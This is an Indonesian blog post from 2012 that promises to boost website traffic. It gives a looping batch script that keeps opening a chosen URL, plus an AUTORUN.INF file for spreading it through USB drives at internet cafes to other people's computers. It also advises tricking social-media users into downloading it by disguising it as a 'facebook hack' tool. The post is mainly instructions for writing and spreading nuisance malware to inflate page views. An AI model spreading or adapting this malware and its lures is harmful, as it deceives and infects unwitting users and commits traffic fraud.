Headlines News :
Home » » Meningkatkan Traffic web Secara cepat

Meningkatkan Traffic web Secara cepat

Written By Ariez Marinecyber on Senin, 01 Oktober 2012 | 10/01/2012 12:28:00 AM


Blog lo sepi traffic ? Artikel lu ngak ada yang baca , tapi pengan banget traffic  web nya naik ? langsung saja simak artikel di bawah ini :2thumbup. Cara ini sangat mudah di lakukan hanya dengan mengunakan sedikit pemograman , baiklah sekarang liat kode di bawah ini.


1. @ECHO off
2. Buka
3. Start http://ridwan-ghanteng.blogspot.com
4. Goto buka

Cara nyebarin yang lain yaitu mengunakan Flashdisk , bagamana cara nya ? cara nya mudah yaitu cukup dengan colokin Flashdisk ke komputer target lalu buat autorun yang berfungsi menyebarkan file tersebut ke semua device yang terpasang di komputer. Sebarkan ke warnet-warnet terjauh. Atau teman dekat lo hahahaha , Sistem kerjanya autorun  jika ada client yang membuka komputer warnet tadi dengan menyisipkan flashdisk, maka file tersebut akan segera tersimpan pada Flashdisk sang client & ketika client tadi mencolokkan Flashdisk tadi kedalam komputer, maka ketika Autorun berjalan file tersebut akan menyebar kesemua device & menjalankan fungsinya yaitu membuka website . Untuk cara membuat autorun nya menggunakan kode di bawah iniSimpan file tersebut dengan nama bebas tapi ingat extensi harus *bat , Jangan lupa ubah url  http://ridwan-ghanteng.blogspot.com  menjadi website yang mau di Nakalin Traffic nya . setelah itu terserah kamu deh kalo gw sih nyebarin file tersebut di facebook , Twitter dan media jejaring social lain , Gunakan iming- iming biar banyak orang yang download file mu tadi missal nya “ eh nih gw ada software cara hack facebook “ mudah bukan =)) ,

1. [ AUTORUN ]
2. Open=namafile.bat
3. Icon=namafile.ico

Simpan file tersebut dgn nama AUTORUN.INF , sekarang udah jadi . lalu sebarka
n
Share this article :

Pengikut

my Twitter

 
Support : Creating Website | Johny Template | Mas Template
Copyright © 2011. World zone - DUNIA XXX - All Rights Reserved
Template Created by Creating Website Published by Mas Template
Proudly powered by Blogger